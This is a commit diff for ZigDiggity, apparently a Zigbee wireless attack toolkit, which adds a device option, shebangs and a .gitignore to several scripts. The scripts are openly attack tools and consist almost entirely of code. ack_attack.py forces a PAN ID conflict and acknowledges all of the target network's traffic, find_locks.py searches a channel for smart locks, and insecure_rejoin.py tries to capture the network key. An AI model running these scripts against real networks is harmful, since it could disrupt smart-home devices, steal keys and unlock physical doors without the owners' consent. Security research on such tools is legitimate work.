General Updates

Ensure top level python files are executable.
Ensure top level python files identify puthon interpreter.
Enhance command line options to allow for greater runtime control and device specification.

Author: SteveJM

.gitignore

@@ -0,0 +1,3 @@
+__pycache__
+venv
+.vscode

ack_attack.py

@@ -1,69 +1,71 @@
-import os
-import sys
-sys.path.append(os.getcwd() + "/zigdiggity")
-
-import time
-import signal
-import argparse
-from scapy.layers.dot15d4 import *
-from scapy.layers.zigbee import *
-
-from zigdiggity.radios.raspbee_radio import RaspbeeRadio
-from zigdiggity.radios.observer_radio import ObserverRadio
-from zigdiggity.observers.wireshark_observer import WiresharkObserver
-import zigdiggity.crypto.utils as crypto_utils
-from zigdiggity.misc.actions import *
-from zigdiggity.packets.utils import get_pan_id, get_source
-from zigdiggity.interface.components.logo import Logo
-
-parser = argparse.ArgumentParser(description='Perform an acknowledge attack against the target network')
-parser.add_argument('-c','--channel',action='store',type=int,dest='channel',required=True,help='Channel to use')
-parser.add_argument('-e','--epan',action='store',type=lambda s: int(s.replace(':',''),16),dest='epan',required=True,help='The Extended PAN ID of the network to target')
-parser.add_argument('-w','--wireshark',action='store_true',dest='wireshark',required=False,help='The Extended PAN ID of the network to target')
-args = parser.parse_args()
-
-logo = Logo()
-logo.print()
-
-hardware_radio = RaspbeeRadio("/dev/ttyS0")
-radio = ObserverRadio(hardware_radio)
-
-if args.wireshark:
-    wireshark = WiresharkObserver()
-    radio.add_observer(wireshark)
-
-def handle_interrupt(signal, frame):
-    global interrupted
-    print_notify("Exiting the current script")
-    interrupted = True
-
-CHANNEL = args.channel
-TARGET_EPAN=args.epan
-
-radio.set_channel(CHANNEL)
-
-panid = get_pan_by_extended_pan(radio, TARGET_EPAN)
-if panid is None:
-    print_error("Could not find the PAN ID corresponding to the target network.")
-    exit(1)
-
-print_info("Performing a PAN ID conflict against the network")
-
-for attempts in range(10):
-    pan_conflict_by_panid(radio, panid)
-    time.sleep(2)
-    next_panid = get_pan_by_extended_pan(radio, TARGET_EPAN)
-    if panid != next_panid:
-        break
-    if attempts == 9:
-        print_error("All 10 attempts to perform a PAN ID conflict failed.")
-
-signal.signal(signal.SIGINT, handle_interrupt)
-interrupted = False
-
-print_notify("Acking to all the traffic to PAN 0x%04x" % panid)
-print_info("Use ctrl+c to stop the attack")
-while not interrupted:
-    radio.receive_and_ack(panid=panid, addr=0x0000)
-
-radio.off()
+#!/usr/bin/env python
+import os
+import sys
+sys.path.append(os.getcwd() + "/zigdiggity")
+
+import time
+import signal
+import argparse
+from scapy.layers.dot15d4 import *
+from scapy.layers.zigbee import *
+
+from zigdiggity.radios.raspbee_radio import RaspbeeRadio
+from zigdiggity.radios.observer_radio import ObserverRadio
+from zigdiggity.observers.wireshark_observer import WiresharkObserver
+import zigdiggity.crypto.utils as crypto_utils
+from zigdiggity.misc.actions import *
+from zigdiggity.packets.utils import get_pan_id, get_source
+from zigdiggity.interface.components.logo import Logo
+
+parser = argparse.ArgumentParser(description='Perform an acknowledge attack against the target network')
+parser.add_argument('-c','--channel',action='store',type=int,dest='channel',required=True,help='Channel to use')
+parser.add_argument('-d','--device',action='store',dest='device',default='/dev/ttyS0',help='Zigbee Radio device')
+parser.add_argument('-e','--epan',action='store',type=lambda s: int(s.replace(':',''),16),dest='epan',required=True,help='The Extended PAN ID of the network to target')
+parser.add_argument('-w','--wireshark',action='store_true',dest='wireshark',required=False,help='The Extended PAN ID of the network to target')
+args = parser.parse_args()
+
+logo = Logo()
+logo.print()
+
+hardware_radio = RaspbeeRadio(args.device)
+radio = ObserverRadio(hardware_radio)
+
+if args.wireshark:
+    wireshark = WiresharkObserver()
+    radio.add_observer(wireshark)
+
+def handle_interrupt(signal, frame):
+    global interrupted
+    print_notify("Exiting the current script")
+    interrupted = True
+
+CHANNEL = args.channel
+TARGET_EPAN=args.epan
+
+radio.set_channel(CHANNEL)
+
+panid = get_pan_by_extended_pan(radio, TARGET_EPAN)
+if panid is None:
+    print_error("Could not find the PAN ID corresponding to the target network.")
+    exit(1)
+
+print_info("Performing a PAN ID conflict against the network")
+
+for attempts in range(10):
+    pan_conflict_by_panid(radio, panid)
+    time.sleep(2)
+    next_panid = get_pan_by_extended_pan(radio, TARGET_EPAN)
+    if panid != next_panid:
+        break
+    if attempts == 9:
+        print_error("All 10 attempts to perform a PAN ID conflict failed.")
+
+signal.signal(signal.SIGINT, handle_interrupt)
+interrupted = False
+
+print_notify("Acking to all the traffic to PAN 0x%04x" % panid)
+print_info("Use ctrl+c to stop the attack")
+while not interrupted:
+    radio.receive_and_ack(panid=panid, addr=0x0000)
+
+radio.off()

beacon.py

@@ -1,3 +1,4 @@
+#!/usr/bin/env python
 import os
 import sys
 sys.path.append(os.getcwd() + "/zigdiggity")
@@ -6,39 +7,52 @@
 import signal
 import random
 import argparse
+import hexdump
 from scapy.layers.dot15d4 import *
 from scapy.layers.zigbee import *
 
 from zigdiggity.radios.raspbee_radio import RaspbeeRadio
 from zigdiggity.radios.observer_radio import ObserverRadio
-from zigdiggity.observers.wireshark_observer import WiresharkObserver
+import zigdiggity.observers.utils as observer_utils
 from zigdiggity.packets.dot15d4 import beacon_request
 from zigdiggity.interface.console import print_notify
 from zigdiggity.misc.timer import Timer
 from zigdiggity.interface.components.logo import Logo
 
 parser = argparse.ArgumentParser(description='Send a beacon request')
 parser.add_argument('-c','--channel',action='store',type=int,dest='channel',required=True,help='Channel to use')
+parser.add_argument('-d','--device',action='store',dest='device',default='/dev/ttyS0',help='Zigbee Radio device')
+parser.add_argument('-s','--stdout',action='store_true',dest='stdout',required=False,help='dump traffic to stdout')
+parser.add_argument('-t','--timeout',action='store',type=int,dest='timeout',default=5,help='response listen timeout')
+parser.add_argument('-v','--verbose',action='store_true',dest='verbose',required=False,help='verbose logging')
 parser.add_argument('-w','--wireshark',action='store_true',dest='wireshark',required=False,help='See all traffic in wireshark')
 args = parser.parse_args()
 
 logo = Logo()
 logo.print()
 
-hardware_radio = RaspbeeRadio("/dev/ttyS0")
+hardware_radio = RaspbeeRadio(args.device)
 radio = ObserverRadio(hardware_radio)
 
 if args.wireshark:
-    wireshark = WiresharkObserver()
-    radio.add_observer(wireshark)
-
-CHANNEL = args.channel
-
-print_notify("Sending the beacon request")
-radio.send(beacon_request(random.randint(0,255)))
-
-timer = Timer(5)
-while not timer.has_expired():
-    radio.receive()
-
-radio.off()
+    observer_utils.register_wireshark(radio)
+    if args.verbose:
+        print_notify("Registered Wireshark Observer")
+if args.stdout:
+    observer_utils.register_stdout(radio)
+    if args.verbose:
+        print_notify("Registered Stdout Observer")
+
+radio.set_channel(args.channel)
+radio.receive()
+
+if args.verbose:
+    print_notify("Sending the beacon request to channel %d" % radio.get_channel())
+
+try:
+    timer = Timer(args.timeout)
+    radio.send_and_retry(beacon_request(random.randint(0,255)))
+    while not timer.has_expired():
+        radio.receive()
+finally:
+   radio.off()

find_locks.py

@@ -1,33 +1,35 @@
-import os
-import sys
-sys.path.append(os.getcwd() + "/zigdiggity")
-
-import time
-import argparse
-from scapy.layers.dot15d4 import *
-from scapy.layers.zigbee import *
-
-from zigdiggity.radios.raspbee_radio import RaspbeeRadio
-from zigdiggity.radios.observer_radio import ObserverRadio
-from zigdiggity.observers.wireshark_observer import WiresharkObserver
-from zigdiggity.interface.console import print_notify
-import zigdiggity.crypto.utils as crypto_utils
-from zigdiggity.misc.actions import *
-
-parser = argparse.ArgumentParser(description='Attempt to find locks on a channel')
-parser.add_argument('-c','--channel',action='store',type=int,dest='channel',required=True,help='Channel to use')
-parser.add_argument('-w','--wireshark',action='store_true',dest='wireshark',required=False,help='See all traffic in wireshark')
-args = parser.parse_args()
-
-hardware_radio = RaspbeeRadio("/dev/ttyS0")
-radio = ObserverRadio(hardware_radio)
-
-if args.wireshark:
-    wireshark = WiresharkObserver()
-    radio.add_observer(wireshark)
-
-radio.set_channel(args.channel)
-print_notify("Current on channel %d" % args.channel)
-find_locks(radio)
-
-radio.off()
+#!/usr/bin/env python
+import os
+import sys
+sys.path.append(os.getcwd() + "/zigdiggity")
+
+import time
+import argparse
+from scapy.layers.dot15d4 import *
+from scapy.layers.zigbee import *
+
+from zigdiggity.radios.raspbee_radio import RaspbeeRadio
+from zigdiggity.radios.observer_radio import ObserverRadio
+from zigdiggity.observers.wireshark_observer import WiresharkObserver
+from zigdiggity.interface.console import print_notify
+import zigdiggity.crypto.utils as crypto_utils
+from zigdiggity.misc.actions import *
+
+parser = argparse.ArgumentParser(description='Attempt to find locks on a channel')
+parser.add_argument('-c','--channel',action='store',type=int,dest='channel',required=True,help='Channel to use')
+parser.add_argument('-d','--device',action='store',dest='device',default='/dev/ttyS0',help='Zigbee Radio device')
+parser.add_argument('-w','--wireshark',action='store_true',dest='wireshark',required=False,help='See all traffic in wireshark')
+args = parser.parse_args()
+
+hardware_radio = RaspbeeRadio(args.device)
+radio = ObserverRadio(hardware_radio)
+
+if args.wireshark:
+    wireshark = WiresharkObserver()
+    radio.add_observer(wireshark)
+
+radio.set_channel(args.channel)
+print_notify("Current on channel %d" % args.channel)
+find_locks(radio)
+
+radio.off()

insecure_rejoin.py

@@ -1,52 +1,55 @@
-import os
-import sys
-sys.path.append(os.getcwd() + "/zigdiggity")
-
-import time
-import argparse
-from scapy.layers.dot15d4 import *
-from scapy.layers.zigbee import *
-
-from zigdiggity.radios.raspbee_radio import RaspbeeRadio
-from zigdiggity.radios.observer_radio import ObserverRadio
-from zigdiggity.observers.wireshark_observer import WiresharkObserver
-import zigdiggity.crypto.utils as crypto_utils
-from zigdiggity.misc.actions import *
-from zigdiggity.interface.components.logo import Logo
-
-parser = argparse.ArgumentParser(description='Attempt to unlock the target lock')
-parser.add_argument('-c','--channel',action='store',type=int,dest='channel',required=True,help='Channel to use')
-parser.add_argument('-e','--epan',action='store',type=lambda s: int(s.replace(':',''),16),dest='epan',required=True,help='The Extended PAN ID of the network to target')
-parser.add_argument('-w','--wireshark',action='store_true',dest='wireshark',required=False,help='See all traffic in wireshark')
-args = parser.parse_args()
-
-logo = Logo()
-logo.print()
-
-hardware_radio = RaspbeeRadio("/dev/ttyS0")
-radio = ObserverRadio(hardware_radio)
-
-if args.wireshark:
-    wireshark = WiresharkObserver()
-    radio.add_observer(wireshark)
-
-TARGET_EPAN = args.epan
-CHANNELS = [args.channel]
-
-start_time = time.time()
-for channel in CHANNELS:
-
-    radio.set_channel(channel)
-
-    panid = get_pan_by_extended_pan(radio, TARGET_EPAN)
-    if panid is None:
-        print_error("Could not find the PAN ID corresponding to the target network.")
-        exit(1)
-
-    for attempt in range(3):
-        key = insecure_rejoin_by_panid(radio, panid, extended_src=0x01020304050607)
-        if key is not None:
-            break
-
-radio.off()
-print_notify("Total elapsed time: %f seconds" % (time.time()-start_time))
+#!/usr/bin/env python
+import os
+import sys
+sys.path.append(os.getcwd() + "/zigdiggity")
+
+import time
+import argparse
+from scapy.layers.dot15d4 import *
+from scapy.layers.zigbee import *
+
+from zigdiggity.radios.raspbee_radio import RaspbeeRadio
+from zigdiggity.radios.observer_radio import ObserverRadio
+from zigdiggity.observers.wireshark_observer import WiresharkObserver
+import zigdiggity.crypto.utils as crypto_utils
+from zigdiggity.misc.actions import *
+from zigdiggity.interface.components.logo import Logo
+
+parser = argparse.ArgumentParser(description='Attempt to perform an insecure network join')
+parser.add_argument('-a','--attempts',action='store',type=int,dest='attempts',default=3,help='Number of rejoin attempts')
+parser.add_argument('-c','--channel',action='store',type=int,dest='channel',required=True,help='Channel to use')
+parser.add_argument('-d','--device',action='store',dest='device',default='/dev/ttyS0',help='Zigbee Radio device')
+parser.add_argument('-e','--epan',action='store',type=lambda s: int(s.replace(':',''),16),dest='epan',required=True,help='The Extended PAN ID of the network to target')
+parser.add_argument('-w','--wireshark',action='store_true',dest='wireshark',required=False,help='See all traffic in wireshark')
+args = parser.parse_args()
+
+logo = Logo()
+logo.print()
+
+hardware_radio = RaspbeeRadio(args.device)
+radio = ObserverRadio(hardware_radio)
+
+if args.wireshark:
+    wireshark = WiresharkObserver()
+    radio.add_observer(wireshark)
+
+TARGET_EPAN = args.epan
+CHANNELS = [args.channel]
+
+start_time = time.time()
+for channel in CHANNELS:
+
+    radio.set_channel(channel)
+
+    panid = get_pan_by_extended_pan(radio, TARGET_EPAN)
+    if panid is None:
+        print_error("Could not find the PAN ID corresponding to the target network.")
+        exit(1)
+
+    for attempt in range(args.attempts):
+        key = insecure_rejoin_by_panid(radio, panid, extended_src=0x01020304050607)
+        if key is not None:
+            break
+
+radio.off()
+print_notify("Total elapsed time: %f seconds" % (time.time()-start_time))